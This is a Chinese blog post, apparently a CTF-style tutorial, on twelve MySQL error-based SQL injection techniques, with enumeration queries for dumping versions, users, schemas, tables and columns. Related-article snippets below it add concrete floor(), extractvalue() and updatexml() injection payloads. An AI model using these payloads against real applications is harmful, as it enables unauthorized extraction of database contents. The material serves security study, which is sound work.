详细解读mysql十二种报错注入

最新推荐文章于 2024-05-05 20:11:53 发布
置顶 最新推荐文章于 2024-05-05 20:11:53 发布
阅读量1.6k 收藏 24
点赞数 4
分类专栏: sql报错注入 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46706771/article/details/112771788
版权

使用条件

查询不回显内容,会打印错误信息
在这里插入图片描述

报错原理

报错型注入则是利用了MySQL的第8652号bug :Bug #8652 group by part of rand() returns duplicate key error来进行的盲注,使得MySQL由于函数的特性返回错误信息,进而我们可以显示我们想要的信息,从而达到注入的效果

mysql语句的特性–子查询

在这里插入图片描述
在这里虽然语句b有错误,但是由于语句a没有错误所以成功查询出变量A,随后变量A与语句b构成新的语句,又由于语句b存在错误,所以报错时连带着变量A一起报错,从而实现了变量A的查询。

十二种报错注入

在这里插入图片描述
我将其根据报错原理分成五大类

详细解释

MYSQL 通过floor() 报错注入

MYSQL 通过exp()报错注入

MYSQL 通过ExtractValue()报错注入

MYSQL 通过UpdateXml()报错注入

MYSQL 通过NAME_CONST()报错注入

MYSQL 通过Join报错注入

MYSQL 通过GeometryCollection()报错注入

MYSQL 其他函数报错注入

这里说明一下,在“操作代码”处将语句如下替换
查询MySQL版本

select @@version

select version()

查询用户

select user()

暴库

select group_concat(schema_name) from information_schema.schemata

爆表

select group_concat(table_name) from information_schema.`TABLES` WHERE table_schema = database()

爆列

select group_concat(column_name) from information_schema.columns where table_name = '表名'

爆字段

select group_concat(列名) from 表名

各个例题的数据库为
数据库名ctftest

表名users

列名
id mane password

字段
1 a.name a.password
2 b.name b.password
3 c.name c.password
4 d.name d.password

C1yas0
关注
  • 4
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MYSQL报错注入
聚鼎安全
01-08 3276
目录审计思路报错语句报错函数查询表floor报错函数讲解报错原理语句xpath语法报错函数讲解语句整数溢出报错exppowcot列名重复报错name_constjoin using几何函数报错不存在函数报错 审计思路 代码中带入查询的参数没有经过任何过滤并产生报错,具有报错信息提示,就可以用报错查询。 常用报错检测符号:’ \ ; %00 ) ( # " 报错函数通常尤其最长报错输出的限制,面对这种情况,可以进行分割输出。 特殊函数的特殊参数进运行一个字段、一行数据的返回,使用group_c
MySQL五种报错注入1
08-04
MySQL五种报错注入是一种利用数据库的错误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞时被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
MySQL常见十种报错注入
weixin_52501704的博客
09-28 4033
MySQL常见十种报错注入
2024年最全Web安全:报错注入原理分析,报错注入步骤,报错注入常用函数(2),2024年最新网络安全音频面试题
最新发布
2301_82242964的博客
05-05 1017
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
怎么调取cstring left函数_Go语言函数深度解析(上)
weixin_39605414的博客
11-22 190
基本原理函数,几乎是每种编程语言的必备语法,通过函数把一系列的动作汇总起来,在不同的地方重复使用。我们在数学中曾经就使用过函数,他的形式类似于y=f(x),这就是一个完整的调用过程,y就是函数计算后得到的值,x就是传入的变量。怎么用?相信在看这个教程的人肯定已经接触过其他的编程语言,我就不多废话了,就是干。go语言中最基本的函数是这样的,以func为关键字标记函数funcfunctionPara...
12种报错注入+万能语句
hanzhen668的博客
04-26 2343
1、通过floor报错,注入语句如下: and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a); 2、通过ExtractValue报错,注入语句如下: and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)..
Mysql 的显错注入
weixin_59584646的博客
08-07 258
MySQL的显错注入
MYSQL updatexml()函数报错注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL报错注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据被错误地用于构造数据库查询时,导致数据库返回错误信息。这些错误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
Mysql报错注入详解.docx
11-20
Mysql报错注入详解.docxMysql报错注入详解.docx
MySQL报错注入方法整理
jpygx123的博客
11-17 9565
mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。 报错注入:(and后不能直接跟select,可以加()) 1.报错注入floor---->(select 1 from (select count(*),concat((payload[]),floo...
mysql报错型手工注入_mysql手工注入
weixin_33526828的博客
02-28 228
1.判断是否存在注入点的方法和其他数据库类似,and 1=1 和and 1=2 2.判断数据库为oracle 提交注释字符/*,返回正常即是MySQL,否则继续提交注释符号--,该符号......实战access手工注入(通用的方法) “显示友好的HTTP错误信息”前面的钩,...Mysql 报错注入 SQL 注入获取数据库数据,利用的方法可以大致分为联合查询、报错、布尔盲注 以及延时注入, ...
新型mysql报错注入_新型Mysql报错注入_MySQL
weixin_35342955的博客
01-19 70
原文是俄文,不好做翻译,附上大概的内容:这种报错注入主要基于Mysql数据类型溢出mysql > SELECT 18446744073709551610 * 2 ;ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'mysql > SELECT - 1 * ...
mysql报错注入_mysql报错注入
weixin_29214335的博客
01-13 248
报错注入这里主要介绍3种MySQL数据库报错注入的发法,分别是updatexml、floor和exp。1.updatexmlupdatexml的报错原理从本质上来说就是函数的报错。selectupdatexml(1,concat(0x7e,(select version()),0x7e),1);这里还是使用前面的例子,举出一个爆破数据库版本的样例Payload:爆破数据库版本信息?id=1' +...
Mysql注入 -- 报错注入
weixin_41489908的博客
05-20 738
​时刻清零,不要老把自己的一套拿出来。。。 ---- 网易云热评 一、常用函数 1、count();统计该列有几条数据 2、rand():产生0-1随机数 3、group by:根据某一列排序,改列必须出现在前面查询的内容 4、floor(1.23):获取小于等于该值的最大整数 5、as:给查询的列名内容重命名 6、concat(1,2,3):将里面的内容连接在一起 二、实例演示 1、获取当前数据库名称 http://192.168.139.129/sqli/Less-.
MySQL显错注入
weixin_53863129的博客
09-09 94
显错注入 这里拿MySQL数据库做事例,其他数据库方法类似,函数有差异而已 准备知识: 1、MySQL数据库5.0以上版本有系统自带库(information_schema),其他数据库可采用爆破或猜解来得到 2、 库名:table_schema 表名:table_name 字段名:table_column 核心:显错注入,顾名思义就是利用数据库查询语句,将数据库的内容显示出来,一般在回显页面中,网页源代码可能也存在回显 1、判断是否存在注入 http://192.16
显错sql注入练习
D_Dwjh的博客
08-04 179
sql注入rank2 这里的id是个单引号的字符串,所以要注意,要先把单引号闭合,不然输的东西都变成字符串,我们应该让他变成执行的代码语句。最后还需要把多余的单引号注释掉,不能忘记哦~ 输入: ’ and 1=1 – q 输入: ’ and 1=2 – q 发现当成输入语句当成代码来执行了,说明存在sql注入,这里上面url发现是看不懂的编码,可以利用在线url编码工具,进行解码,如下图所示: 然后继续回归正题,发现存在注入点后,开始分析这个注入点存在的字段数 输入: ’ and 1=1 orde
SQL注入之mysql显错注入
weixin_34060741的博客
11-12 853
在我们实际渗透中,明明发现一个注入点,本以为丢给sqlmap就可以了,结果sqlmap只显示确实是注入点,但是数据库却获取不了,如图1所示,这时我们可以使用手工进行注入,判断出过滤规则以及基本过滤情况,然后再选择对应的sqlmap脚本(如果有的话),本文主要是讲述如何通过mysql函数报错来进行注入,另外如何使用手工进行全程注入的利用过程,如果你...
mysql报错注入updatexml原理
05-17
MySQL 报错注入是一种利用错误信息披露漏洞来进行 SQL 注入攻击的方法。其中,updatexml 函数是一种常用的利用方式之一。 updatexml 函数可以用于对 XML 类型的数据进行操作。其基本语法如下: ``` updatexml(target_xml, xpath_expr, new_value) ``` 其中,target_xml 是待修改的 XML 数据,xpath_expr 是 XPath 表达式,new_value 是新的值。 在进行 SQL 注入攻击时,攻击者可以构造恶意的 xpath_expr 参数,使得 MySQL 数据库返回错误的信息,从而获取敏感信息。 具体实现方法可以参考以下示例: ``` SELECT updatexml(null,concat(0x7e,(SELECT user()),0x7e),null); ``` 在这个例子中,攻击者使用 concat 函数将波浪符号(0x7e)和当前用户的信息拼接成字符串,并作为 xpath_expr 参数传递给 updatexml 函数。由于这个参数不合法,MySQL 数据库会返回错误信息,其中包含了当前用户的信息。攻击者就可以从错误信息中获取敏感信息。 为了防止这种攻击,应该对用户输入进行严格的过滤和验证,避免恶意的输入。同时,也可以通过限制 MySQL 用户的权限来降低攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C1yas0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值